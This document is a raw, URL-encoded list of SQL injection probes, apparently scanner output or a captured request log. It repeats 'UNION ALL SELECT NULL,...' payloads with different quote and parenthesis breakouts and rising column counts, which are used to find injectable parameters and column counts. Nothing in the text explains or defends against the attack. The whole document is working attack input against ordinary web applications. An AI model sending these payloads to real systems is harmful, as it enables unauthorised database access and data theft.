1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 